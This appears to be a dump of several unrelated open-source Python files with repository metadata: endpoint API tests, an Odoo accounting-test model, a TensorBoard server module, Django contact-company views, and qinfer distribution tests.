primary_admin_gate_name="container name space (pid)", company="Docker",
product="Docker", c_type="container")
node2 = Node(name="mysqld2", container=container2)
endpoint1 = Endpoint(url="mysql://test_twin_endpoints_link_container1:4385", parent_node_id=self.node1.id)
endpoint2 = Endpoint(url="mysql://test_twin_endpoints_link_container2:4385", parent_node=node2)
endpoint1.add_twin_endpoint(endpoint2, sync=False)
self.assertTrue(endpoint2 in endpoint1.twin_endpoints_2_add)
endpoint1.save()
self.assertFalse(endpoint2 in endpoint1.twin_endpoints_2_add)
self.assertTrue(endpoint2.id in endpoint1.twin_endpoints_id)
self.assertTrue(endpoint1.id in endpoint2.twin_endpoints_id)
endpoint2.del_twin_endpoint(endpoint1, sync=False)
self.assertTrue(endpoint1 in endpoint2.twin_endpoints_2_rm)
self.assertTrue(endpoint2.id in endpoint1.twin_endpoints_id)
self.assertTrue(endpoint1.id in endpoint2.twin_endpoints_id)
endpoint2.save()
self.assertFalse(endpoint1 in endpoint2.twin_endpoints_2_rm)
self.assertFalse(endpoint2.id in endpoint1.twin_endpoints_id)
self.assertFalse(endpoint1.id in endpoint2.twin_endpoints_id)
endpoint1.add_twin_endpoint(endpoint2)
self.assertTrue(endpoint2.id in endpoint1.twin_endpoints_id)
self.assertTrue(endpoint1.id in endpoint2.twin_endpoints_id)
endpoint2.del_twin_endpoint(endpoint1)
self.assertFalse(endpoint2.id in endpoint1.twin_endpoints_id)
self.assertFalse(endpoint1.id in endpoint2.twin_endpoints_id)
endpoint1.remove()
endpoint2.remove()
node2.remove()
container2.remove()
def test_transac_create_remove_endpoint_basic(self):
SessionService.open_session("test_transac_create_remove_endpoint_basic")
endpoint = Endpoint(url="mysql://test_transac_create_remove_endpoint_basic_container1:4385",
parent_node_id=self.node1.id)
endpoint.save()
SessionService.commit()
self.assertIsNotNone(endpoint.id)
self.node1.sync()
self.assertTrue(endpoint.id in self.node1.endpoints_id)
self.assertIsNone(endpoint.remove())
self.node1.sync()
self.assertFalse(endpoint.id in self.node1.endpoints_id)
SessionService.commit()
SessionService.close_session()
def test_transac_create_remove_endpoint_parent_node(self):
SessionService.open_session("test_transac_create_remove_endpoint_parent_node")
container2 = Container(name="test_transac_create_remove_endpoint_parent_node_container2",
gate_uri="ssh://my_host/docker/test_container2",
primary_admin_gate_name="container name space (pid)", company="Docker",
product="Docker", c_type="container")
node2 = Node(name="mysqld", container=container2)
node2.save()
SessionService.commit()
endpoint2 = Endpoint(url="mysql://test_transac_create_remove_endpoint_parent_node_container1:4385",
parent_node=node2)
endpoint2.save()
SessionService.commit()
self.assertIsNotNone(endpoint2.id)
self.assertTrue(endpoint2.id in node2.endpoints_id)
self.assertIsNone(endpoint2.remove())
self.assertFalse(endpoint2.id in node2.endpoints_id)
node2.remove()
container2.remove()
SessionService.commit()
SessionService.close_session()
def test_transac_get_endpoints(self):
SessionService.open_session("test_transac_get_endpoints")
endpoint = Endpoint(url="mysql://test_transac_get_endpoints_container1:4385",
parent_node_id=self.node1.id)
endpoint.save()
self.assertTrue(endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'"))
self.assertTrue(endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'", cid=self.container1.id))
self.assertTrue(endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'", nid=self.node1.id))
self.assertTrue(endpoint in EndpointService.get_endpoints())
SessionService.commit()
self.assertTrue(endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'"))
self.assertTrue(endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'", cid=self.container1.id))
self.assertTrue(endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'", nid=self.node1.id))
self.assertTrue(endpoint in EndpointService.get_endpoints())
endpoint.remove()
self.assertFalse(EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'") is not None and
endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'"))
self.assertFalse(EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'") is not None and
endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'", cid=self.container1.id))
self.assertFalse(EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'") is not None and
endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'", nid=self.node1.id))
self.assertFalse(endpoint in EndpointService.get_endpoints())
SessionService.commit()
self.assertFalse(endpoint in EndpointService.get_endpoints())
SessionService.close_session()
def test_transac_endpoint_properties(self):
SessionService.open_session("test_transac_endpoint_properties")
endpoint = Endpoint(url="mysql://test_transac_endpoint_properties_container1:4385",
parent_node_id=self.node1.id)
endpoint.add_property(('int_prop', 10), sync=False)
endpoint.add_property(('long_prop', 10000000), sync=False)
endpoint.add_property(('double_prop', 3.1414), sync=False)
endpoint.add_property(('boolean_prop', True), sync=False)
endpoint.add_property(('string_prop', "value"), sync=False)
datacenter = {"dc": "Sagittarius", "gpsLng": 2.251088, "address": "2 rue Baudin", "gpsLat": 48.895345,
"town": "Courbevoie", "country": "France"}
endpoint.add_property(('map_prop_datacenter', datacenter), sync=False)
endpoint.add_property(('array_prop', [1, 2, 3, 4, 5]), sync=False)
self.assertIsNone(endpoint.properties)
endpoint.save()
SessionService.commit()
self.assertTrue('boolean_prop' in endpoint.properties)
self.assertTrue('double_prop' in endpoint.properties)
self.assertTrue('int_prop' in endpoint.properties)
self.assertTrue('long_prop' in endpoint.properties)
self.assertTrue('map_prop_datacenter' in endpoint.properties)
self.assertTrue('string_prop' in endpoint.properties)
self.assertTrue('array_prop' in endpoint.properties)
endpoint.del_property('int_prop', sync=False)
endpoint.del_property('long_prop', sync=False)
endpoint.del_property('double_prop', sync=False)
endpoint.del_property('boolean_prop', sync=False)
endpoint.del_property('string_prop', sync=False)
endpoint.del_property('map_prop_datacenter', sync=False)
endpoint.del_property('array_prop', sync=False)
self.assertTrue('boolean_prop' in endpoint.properties)
self.assertTrue('double_prop' in endpoint.properties)
self.assertTrue('int_prop' in endpoint.properties)
self.assertTrue('long_prop' in endpoint.properties)
self.assertTrue('map_prop_datacenter' in endpoint.properties)
self.assertTrue('string_prop' in endpoint.properties)
self.assertTrue('array_prop' in endpoint.properties)
endpoint.save()
SessionService.commit()
self.assertFalse(endpoint.properties is not None and 'boolean_prop' in endpoint.properties)
self.assertFalse(endpoint.properties is not None and 'double_prop' in endpoint.properties)
self.assertFalse(endpoint.properties is not None and 'int_prop' in endpoint.properties)
self.assertFalse(endpoint.properties is not None and 'long_prop' in endpoint.properties)
self.assertFalse(endpoint.properties is not None and 'map_prop_datacenter' in endpoint.properties)
self.assertFalse(endpoint.properties is not None and 'string_prop' in endpoint.properties)
self.assertFalse(endpoint.properties is not None and 'array_prop' in endpoint.properties)
endpoint.remove()
SessionService.commit()
SessionService.close_session()
def test_transac_twin_endpoints_link(self):
SessionService.open_session("test_transac_twin_endpoints_link")
container2 = Container(name="test_transac_twin_endpoints_link_container2",
gate_uri="ssh://my_host/docker/test_transac_twin_endpoints_link_container2",
primary_admin_gate_name="container name space (pid)", company="Docker",
product="Docker", c_type="container")
node2 = Node(name="mysqld2", container=container2)
endpoint1 = Endpoint(url="mysql://test_transac_twin_endpoints_link_container1:4385", parent_node_id=self.node1.id)
endpoint2 = Endpoint(url="mysql://test_transac_twin_endpoints_link_container2:4385", parent_node=node2)
endpoint1.add_twin_endpoint(endpoint2, sync=False)
self.assertTrue(endpoint2 in endpoint1.twin_endpoints_2_add)
endpoint1.save()
SessionService.commit()
self.assertFalse(endpoint2 in endpoint1.twin_endpoints_2_add)
self.assertTrue(endpoint2.id in endpoint1.twin_endpoints_id)
self.assertTrue(endpoint1.id in endpoint2.twin_endpoints_id)
endpoint2.del_twin_endpoint(endpoint1, sync=False)
self.assertTrue(endpoint1 in endpoint2.twin_endpoints_2_rm)
self.assertTrue(endpoint2.id in endpoint1.twin_endpoints_id)
self.assertTrue(endpoint1.id in endpoint2.twin_endpoints_id)
endpoint2.save()
SessionService.commit()
self.assertFalse(endpoint1 in endpoint2.twin_endpoints_2_rm)
self.assertFalse(endpoint2.id in endpoint1.twin_endpoints_id)
self.assertFalse(endpoint1.id in endpoint2.twin_endpoints_id)
endpoint1.add_twin_endpoint(endpoint2)
SessionService.commit()
self.assertTrue(endpoint2.id in endpoint1.twin_endpoints_id)
self.assertTrue(endpoint1.id in endpoint2.twin_endpoints_id)
endpoint2.del_twin_endpoint(endpoint1)
SessionService.commit()
self.assertFalse(endpoint2.id in endpoint1.twin_endpoints_id)
self.assertFalse(endpoint1.id in endpoint2.twin_endpoints_id)
endpoint1.remove()
endpoint2.remove()
node2.remove()
container2.remove()
SessionService.commit()
SessionService.close_session()
| agpl-3.0 |
Comunitea/OCB | addons/account_test/account_test.py | 342 | 2169 | # -*- encoding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2005-2006 TINY SPRL. (http://tiny.be) All Rights Reserved.
#
# $Id: product_expiry.py 4304 2006-10-25 09:54:51Z ged $
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
##############################################################################
from openerp.osv import fields, osv
CODE_EXEC_DEFAULT = '''\
res = []
cr.execute("select id, code from account_journal")
for record in cr.dictfetchall():
res.append(record['code'])
result = res
'''
class accounting_assert_test(osv.osv):
_name = "accounting.assert.test"
_order = "sequence"
_columns = {
'name': fields.char('Test Name', required=True, select=True, translate=True),
'desc': fields.text('Test Description', select=True, translate=True),
'code_exec': fields.text('Python code', required=True),
'active': fields.boolean('Active'),
'sequence': fields.integer('Sequence'),
}
_defaults = {
'code_exec': CODE_EXEC_DEFAULT,
'active': True,
'sequence': 10,
}
| agpl-3.0 |
MostafaGazar/tensorflow | tensorflow/tensorboard/backend/server.py | 4 | 5623 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Module for building TensorBoard servers.
This is its own module so it can be used in both actual code and test code.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import threading
import time
import six
from six.moves import BaseHTTPServer
from six.moves import socketserver
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import event_accumulator
from tensorflow.python.summary.impl import gcs
from tensorflow.tensorboard.backend import handler
# How many elements to store per tag, by tag type
TENSORBOARD_SIZE_GUIDANCE = {
event_accumulator.COMPRESSED_HISTOGRAMS: 500,
event_accumulator.IMAGES: 4,
event_accumulator.AUDIO: 4,
event_accumulator.SCALARS: 1000,
event_accumulator.HISTOGRAMS: 50,
}
def ParseEventFilesSpec(logdir):
"""Parses `logdir` into a map from paths to run group names.
The events files flag format is a comma-separated list of path specifications.
A path specification either looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a
spec with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
logdir: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir is None:
return files
for specification in logdir.split(','):
# If it's a gcs path, don't split on colon
if gcs.IsGCSPath(specification):
run_name = None
path = specification
# If the spec looks like /foo:bar/baz, then we assume it's a path with a
# colon.
elif ':' in specification and specification[0] != '/':
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(':')
else:
run_name = None
path = specification
if not gcs.IsGCSPath(path):
path = os.path.realpath(path)
files[path] = run_name
return files
def ReloadMultiplexer(multiplexer, path_to_run):
"""Loads all runs into the multiplexer.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
"""
start = time.time()
for (path, name) in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
multiplexer.Reload()
duration = time.time() - start
logging.info('Multiplexer done loading. Load took %0.1f secs', duration)
def StartMultiplexerReloadingThread(multiplexer, path_to_run, load_interval):
"""Starts a thread to automatically reload the given multiplexer.
The thread will reload the multiplexer by calling `ReloadMultiplexer` every
`load_interval` seconds, starting immediately.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: How many seconds to wait after one load before starting the
next load.
Returns:
A started `threading.Thread` that reloads the multiplexer.
"""
# We don't call multiplexer.Reload() here because that would make
# AddRunsFromDirectory block until the runs have all loaded.
for path in path_to_run.keys():
if gcs.IsGCSPath(path):
gcs.CheckIsSupported()
logging.info(
'Assuming %s is intended to be a Google Cloud Storage path because '
'it starts with %s. If it isn\'t, prefix it with \'/.\' (i.e., use '
'/.%s instead)', path, gcs.PATH_PREFIX, path)
def _ReloadForever():
while True:
ReloadMultiplexer(multiplexer, path_to_run)
time.sleep(load_interval)
thread = threading.Thread(target=_ReloadForever)
thread.daemon = True
thread.start()
return thread
class ThreadedHTTPServer(socketserver.ThreadingMixIn,
BaseHTTPServer.HTTPServer):
"""A threaded HTTP server."""
daemon_threads = True
def BuildServer(multiplexer, host, port):
"""Sets up an HTTP server for running TensorBoard.
Args:
multiplexer: An `EventMultiplexer` that the server will query for
information about events.
host: The host name.
port: The port number to bind to, or 0 to pick one automatically.
Returns:
A `BaseHTTPServer.HTTPServer`.
"""
factory = functools.partial(handler.TensorboardHandler, multiplexer)
return ThreadedHTTPServer((host, port), factory)
| apache-2.0 |
huang4fstudio/django-contacts | src/contacts/views/company.py | 1 | 5913 | from django.core.urlresolvers import reverse
from django.template.defaultfilters import slugify
from django.core.paginator import Paginator, InvalidPage, EmptyPage
from django.http import Http404, HttpResponseForbidden, HttpResponseServerError, HttpResponseRedirect
from django.shortcuts import render_to_response, get_object_or_404
from django.template import RequestContext
from contacts.models import Company
from contacts.forms import CompanyCreateForm, CompanyUpdateForm, PhoneNumberFormSet, EmailAddressFormSet, InstantMessengerFormSet, WebSiteFormSet, StreetAddressFormSet, SpecialDateFormSet
def list(request, page=1, template='contacts/company/list.html'):
"""List of all the comapnies.
:param template: Add a custom template.
"""
company_list = Company.objects.all()
paginator = Paginator(company_list, 20)
try:
companies = paginator.page(page)
except (EmptyPage, InvalidPage):
companies = paginator.page(paginator.num_pages)
kwvars = {
'object_list': companies.object_list,
'has_next': companies.has_next(),
'has_previous': companies.has_previous(),
'has_other_pages': companies.has_other_pages(),
'start_index': companies.start_index(),
'end_index': companies.end_index(),
'previous_page_number': companies.previous_page_number(),
'next_page_number': companies.next_page_number(),
}
return render_to_response(template, kwvars, RequestContext(request))
def detail(request, pk, slug=None, template='contacts/company/detail.html'):
"""Detail of a company.
:param template: Add a custom template.
"""
try:
company = Company.objects.get(pk__iexact=pk)
except Company.DoesNotExist:
raise Http404
kwvars = {
'object': company,
}
return render_to_response(template, kwvars, RequestContext(request))
def create(request, template='contacts/company/create.html'):
"""Create a company.
:param template: A custom template.
:param form: A custom form.
"""
user = request.user
if not user.has_perm('add_company'):
return HttpResponseForbidden()
if request.method == 'POST':
company_form = CompanyCreateForm(request.POST)
if company_form.is_valid():
c = company_form.save(commit=False)
# TODO Make sure that the slug isn't already in the database
if c.nickname:
c.slug = slugify(c.nickname)
else:
c.slug = slugify(c.name)
c.save()
return HttpResponseRedirect(c.get_absolute_url())
else:
return HttpResponseServerError
kwvars = {
'form': CompanyCreateForm(request.POST)
}
return render_to_response(template, kwvars, RequestContext(request))
def update(request, pk, slug=None, template='contacts/company/update.html'):
"""Update a company.
:param template: A custom template.
:param form: A custom form.
"""
user = request.user
if not user.has_perm('change_company'):
return HttpResponseForbidden()
try:
company = Company.objects.get(pk__iexact=pk)
except Company.DoesNotExist:
raise Http404
form = CompanyUpdateForm(instance=company)
phone_formset = PhoneNumberFormSet(instance=company)
email_formset = EmailAddressFormSet(instance=company)
im_formset = InstantMessengerFormSet(instance=company)
website_formset = WebSiteFormSet(instance=company)
address_formset = StreetAddressFormSet(instance=company)
special_date_formset = SpecialDateFormSet(instance=company)
if request.method == 'POST':
form = CompanyUpdateForm(request.POST, instance=company)
phone_formset = PhoneNumberFormSet(request.POST, instance=company)
email_formset = EmailAddressFormSet(request.POST, instance=company)
im_formset = InstantMessengerFormSet(request.POST, instance=company)
website_formset = WebSiteFormSet(request.POST, instance=company)
address_formset = StreetAddressFormSet(request.POST, instance=company)
special_date_formset = SpecialDateFormSet(request.POST, instance=company)
if form.is_valid() and phone_formset.is_valid() and \
email_formset.is_valid() and im_formset.is_valid() and \
website_formset.is_valid() and address_formset.is_valid():
form.save()
phone_formset.save()
email_formset.save()
im_formset.save()
website_formset.save()
address_formset.save()
special_date_formset.save()
return HttpResponseRedirect(company.get_absolute_url())
kwvars = {
'form': form,
'phone_formset': phone_formset,
'email_formset': email_formset,
'im_formset': im_formset,
'website_formset': website_formset,
'address_formset': address_formset,
'special_date_formset': special_date_formset,
'object': company,
}
return render_to_response(template, kwvars, RequestContext(request))
def delete(request, pk, slug=None, template='contacts/company/delete.html'):
"""Update a company.
:param template: A custom template.
"""
user = request.user
if not user.has_perm('delete_company'):
return HttpResponseForbidden()
try:
company = Company.objects.get(pk__iexact=pk)
except Company.DoesNotExist:
raise Http404
if request.method == 'POST':
new_data = request.POST.copy()
if new_data['delete_company'] == 'Yes':
company.delete()
return HttpResponseRedirect(reverse('contacts_company_list'))
else:
return HttpResponseRedirect(company.get_absolute_url())
kwvars = {
'object': company,
}
return render_to_response(template, kwvars, RequestContext(request)) | bsd-3-clause |
Alan-Robertson/python-qinfer | src/qinfer/tests/test_distributions.py | 3 | 28505 | #!/usr/bin/python
# -*- coding: utf-8 -*-
##
# test_distributions.py: Checks that distribution objects act as expected.
##
# © 2017, Chris Ferrie (csferrie@gmail.com) and
# Christopher Granade (cgranade@cgranade.com).
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
##
## FEATURES ###################################################################
from __future__ import absolute_import
from __future__ import division # Ensures that a/b is always a float.
## IMPORTS ####################################################################
import numpy as np
import scipy.stats
from numpy.testing import assert_equal, assert_almost_equal, assert_array_less
from qinfer.tests.base_test import DerandomizedTestCase
from qinfer.utils import assert_sigfigs_equal
from qinfer.distributions import *
## CLASSES ####################################################################
class TestNormalDistributions(DerandomizedTestCase):
"""
Tests ``NormalDistribution`` and ``MultivariateNormalDistribution``
"""
## TEST METHODS ##
def test_normal_moments(self):
"""
Distributions: Checks that the normal distribtion has the right moments.
"""
dist = NormalDistribution(0, 1)
samples = dist.sample(40000)
assert_almost_equal(1, samples.var(), 1)
assert_almost_equal(0, samples.mean(), 2)
def test_normal_n_rvs(self):
"""
Distributions: Tests for expected number of RVS.
"""
dist = NormalDistribution(0, 1)
assert(dist.n_rvs == 1)
def test_multivar_normal_moments(self):
"""
Distributions: Checks that the multivariate
normal distribtion has the right moments.
"""
MU = np.array([0,1])
COV = np.array([[1,0.2],[0.2,2]])
dist = MultivariateNormalDistribution(MU, COV)
samples = dist.sample(100000)
assert_almost_equal(COV, np.cov(samples[:,0],samples[:,1]), 1)
assert_almost_equal(MU, np.mean(samples, axis=0), 2)
def test_multivar_normal_n_rvs(self):
"""
Distributions: Tests for expected number of RVS.
"""
MU = np.array([0,1])
COV = np.array([[1,0.2],[0.2,2]])
dist = MultivariateNormalDistribution(MU, COV)
assert(dist.n_rvs == 2)
class TestSlantedNormalDistribution(DerandomizedTestCase):
"""
Tests ``SlantedNormalDistribution``
"""
## TEST METHODS ##
#TODO
def test_slantednormal_moments(self):
"""
Distributions: Checks that the slanted normal
distribution has the right moments.
"""
ranges = [[0,1],[0,2],[2,3]]
weight = 2
dist = SlantedNormalDistribution(ranges=ranges, weight=weight)
samples = dist.sample(150000)
assert_sigfigs_equal(
np.mean(np.array(ranges), axis=1),
np.mean(samples, axis=0),
1)
assert_sigfigs_equal(1/12+4, samples[:,0].var(), 1)
assert_sigfigs_equal(4/12+4, samples[:,1].var(), 1)
assert_sigfigs_equal(1/12+4, samples[:,2].var(), 1)
class TestLogNormalDistribution(DerandomizedTestCase):
"""
Tests ``LogNormalDistribution``
"""
## TEST METHODS ##
def test_lognormal_moments(self):
"""
Distributions: Checks that the log normal
distribution has the right moments.
"""
mu, sig = 3, 2
dist = LogNormalDistribution(mu=mu, sigma=sig)
samples = dist.sample(150000)
assert_sigfigs_equal(
scipy.stats.lognorm.mean(1,3,2),
samples.mean(),
1)
assert_sigfigs_equal(
np.round(scipy.stats.lognorm.var(1,3,2)),
np.round(samples.var()),
1)
def test_lognormal_n_rvs(self):
"""
Distributions: Tests for expected number of RVS.
"""
dist = LogNormalDistribution(mu=3, sigma=2)
assert(dist.n_rvs == 1)
class TestUniformDistribution(DerandomizedTestCase):
"""
Tests ``UniformDistribution`` and ``DiscreteUniformDistribution``
"""
## TEST METHODS ##
def test_univ_uniform_range(self):
"""
Distributions: Checks that the univariate uniform dist obeys limits.
"""
for lower, upper in [(0, 1), (-1, 1), (-1, 5)]:
dist = UniformDistribution([lower, upper])
samples = dist.sample(1000)
assert np.all(samples >= lower)
assert np.all(samples <= upper)
def test_univ_uniform_moments(self):
"""
Distributions: Checks that the univ. uniform dist. has the right moments.
"""
dist = UniformDistribution([[0, 1]])
samples = dist.sample(10000)
# We use low-precision checks here, since the error goes as 1/sqrt{N}.
# Determinism helps us be sure that once we pass, we'll keep passing,
# but it does nothing to make the moments accurate.
assert_almost_equal(1 / 12, samples.var(), 2)
assert_almost_equal(1 / 2, samples.mean(), 2)
def test_univ_uniform_n_rvs(self):
"""
Distributions: Tests for expected number of RVS.
"""
dist = UniformDistribution([[0, 1]])
assert(dist.n_rvs == 1)
def test_uniform_shape(self):
"""
Distributions: Checks that the multivar. uni. dist has the right shape.
"""
dist = UniformDistribution([[0, 1], [0, 2], [0, 3]])
assert dist.sample(100).shape == (100, 3)
def test_uniform_n_rvs(self):
"""
Distributions: Tests for expected number of RVS.
"""
dist = UniformDistribution([[0, 1], [0, 2], [0, 3]])
assert(dist.n_rvs == 3)
def test_discrete_uniform_moments(self):
"""
Distributions: Checks that the discrete uniform dist. has the right moments.
"""
dist = DiscreteUniformDistribution(5)
samples = dist.sample(200000).astype(float)
assert_sigfigs_equal((2**10-1)/12, np.var(samples), 1)
assert_sigfigs_equal(16, np.mean(samples), 1)
def test_discrete_uniform_n_rvs(self):
"""
Distributions: Tests for expected number of RVS.
"""
dist = DiscreteUniformDistribution(5)
assert(dist.n_rvs == 1)
class TestMVUniformDistribution(DerandomizedTestCase):
"""
Tests ``MVUniformDistribution``
"""
## TEST METHODS ##
def test_mvuniform_moments(self):
"""
Distributions: Checks that ``MVUniformDistribution`` has the right moments.
"""
dist = MVUniformDistribution(dim=6)
samples = dist.sample(100000)
assert_sigfigs_equal(5/(36*7), samples[:,3].var(), 2)
assert_sigfigs_equal(np.array([1/6]*6), np.mean(samples, axis=0), 2)
def test_mvuniform_n_rvs(self):
"""
Distributions: Tests for expected number of RVS.
"""
dist = MVUniformDistribution(dim=3)
assert(dist.n_rvs == 3)
class TestConstantDistribution(DerandomizedTestCase):
"""
Tests ``ConstantDistribution``
"""
## TEST METHODS ##
def test_constant(self):
"""
Distributions: Checks that the constant distribution is constant.
"""
dist = ConstantDistribution([1, 2, 3])
samples = dist.sample(100)
assert samples.shape == (100, 3)
assert np.all(samples[:, 0] == 1)
assert np.all(samples[:, 1] == 2)
assert np.all(samples[:, 2] == 3)
def test_constant_n_rvs(self):
"""
Distributions: Tests for expected number of RVS.
"""
dist = ConstantDistribution([1, 2, 3])
assert(dist.n_rvs == 3)
class TestBetaDistributions(DerandomizedTestCase):
"""
Tests ``BetaDistribution`` and ``BetaBinomialDistribution``
"""
## TEST METHODS ##
def test_beta_moments(self):
"""
Distributions: Checks that the beta distribution has the right
moments, with either of the two input formats
"""
alpha, beta = 10, 42
mean = alpha / (alpha + beta)
var = alpha * beta / ((alpha + beta) ** 2 * (alpha + beta + 1))
dist = BetaDistribution(alpha=alpha,beta=beta)
samples = dist.sample(100000)
assert samples.shape == (100000,1)
assert_almost_equal(samples.mean(), mean, 2)
assert_almost_equal(samples.var(), var, 2)
dist = BetaDistribution(mean=mean,var=var)
samples = dist.sample(100000)
assert samples.shape == (100000,1)
assert_almost_equal(samples.mean(), mean, 2)
assert_almost_equal(samples.var(), var, 2)
def test_beta_n_rvs(self):
"""
Distributions: Tests for expected number of RVS.
"""
dist = BetaDistribution(alpha=10,beta=42)
assert(dist.n_rvs == 1)
def test_betabinomial_moments(self):
"""
Distributions: Checks that the beta-binomial distribution has the right
moments, with either of the two input formats
"""
n = 10
alpha, beta = 10, 42
mean = n * alpha / (alpha + beta)
var = n * alpha * beta * (alpha + beta + n) / ((alpha + beta) ** 2 * (alpha + beta + 1))
dist = BetaBinomialDistribution(n, alpha=alpha,beta=beta)
samples = dist.sample(1000000)
assert samples.shape == (1000000,1)
assert_almost_equal(samples.mean(), mean, 1)
assert_almost_equal(samples.var(), var, 1)
dist = BetaBinomialDistribution(n, mean=mean,var=var)
samples = dist.sample(1000000)
assert samples.shape == (1000000,1)
assert_almost_equal(samples.mean(), mean, 1)
assert_almost_equal(samples.var(), var, 1)
def test_betabinomial_n_rvs(self):
"""
Distributions: Tests for expected number of RVS.
"""
dist = BetaBinomialDistribution(10, alpha=10,beta=42)
assert(dist.n_rvs == 1)
class TestDirichletDistribution(DerandomizedTestCase):
"""
Tests ``DirichletDistribution``
"""
## TEST METHODS ##
def test_dirichlet_moments(self):
"""
Distributions: Checks that the dirichlet distribution has the right
moments, with either of the two input formats
"""
alpha = [1,2,3,4]
alpha_np = np.array(alpha)
alpha_0 = alpha_np.sum()
mean = alpha_np / alpha_0
var = alpha_np * (alpha_0 - alpha_np) / (alpha_0 **2 * (alpha_0+1))
dist = DirichletDistribution(alpha)
samples = dist.sample(100000)
assert samples.shape == (100000, alpha_np.size)
assert_almost_equal(samples.mean(axis=0), mean, 2)
assert_almost_equal(samples.var(axis=0), var, 2)
alpha = np.array([8,7,5,2,2])
alpha_np = np.array(alpha)
alpha_0 = alpha_np.sum()
mean = alpha_np / alpha_0
var = alpha_np * (alpha_0 - alpha_np) / (alpha_0 **2 * (alpha_0+1))
dist = DirichletDistribution(alpha)
samples = dist.sample(100000)
assert samples.shape == (100000, alpha_np.size)
assert_almost_equal(samples.mean(axis=0), mean, 2)
assert_almost_equal(samples.var(axis=0), var, 2)
class TestGammaDistribution(DerandomizedTestCase):
"""
Tests ``GammaDistribution``
"""
## TEST METHODS ##
def test_gamma_moments(self):
"""
Distributions: Checks that the gamma distribution has the right
moments, with either of the two input formats
"""
alpha, beta = 10, 42
mean = alpha / beta
var = alpha / beta ** 2
dist = GammaDistribution(alpha=alpha,beta=beta)
samples = dist.sample(100000)
assert samples.shape == (100000,1)
assert_almost_equal(samples.mean(), mean, 2)
assert_almost_equal(samples.var(), var, 2)
dist = GammaDistribution(mean=mean,var=var)
samples = dist.sample(100000)
assert samples.shape == (100000,1)
assert_almost_equal(samples.mean(), mean, 2)
assert_almost_equal(samples.var(), var, 2)
def test_gamma_n_rvs(self):
"""
Distributions: Tests for expected number of RVS.
"""
dist = GammaDistribution(alpha=10,beta=42)
assert(dist.n_rvs == 1)
class TestProductDistribution(DerandomizedTestCase):
"""
